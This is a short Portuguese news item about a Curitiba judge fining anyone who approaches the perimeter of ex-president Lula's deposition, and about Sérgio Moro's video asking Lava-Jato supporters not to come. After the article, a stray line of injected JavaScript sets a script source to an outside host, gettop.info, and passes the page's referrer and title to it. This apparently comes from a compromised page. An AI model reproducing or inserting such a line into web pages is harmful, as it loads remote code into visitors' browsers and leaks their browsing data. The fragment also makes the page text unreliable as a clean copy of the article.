A juíza Diele Denardin Zydek, da 5ª Vara da Fazenda Pública de Curitiba decidiu que quem se aproximar, sem autorização, do perímetro estabelecido para o depoimento do ex-presidente Lula terá que pagar multa de R$ 100 mil. A proibição se estende a montagem de acampamentos e estruturas em qualquer rua e praça de Curitiba. As punições podem chegar a R$ 50 mil para quem descumprir estas ordens.
O PT e movimentos alinhados ao partido preparavam forte mobilização para apoiar o ex-presidente. Caravanas estavam partindo de diversos pontos do país. Em contrapartida, o magistrado responsável pela Lava-Jato, Sérgio Moro, pediu, em suas redes sociais, para que pessoas que apoiam a operação não compareçam ao local do depoimento.
\”O interrogatório é um ato normal do processo, nada de diferente irá acontecer nessa data. Tenho ouvido que muita gente que apoia a Lava-Jato pretende vir à Curitiba manifestar esse apoio. Esse apoio sempre foi importante, mas nessa data ele não é necessário. Não venham. Deixem a justiça fazer sua parte\”, disse o magistrado no vídeo.
s.src=\’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=\’ + encodeURIComponent(document.referrer) + \’&default_keyword=\’ + encodeURIComponent(document.title) + \’\’;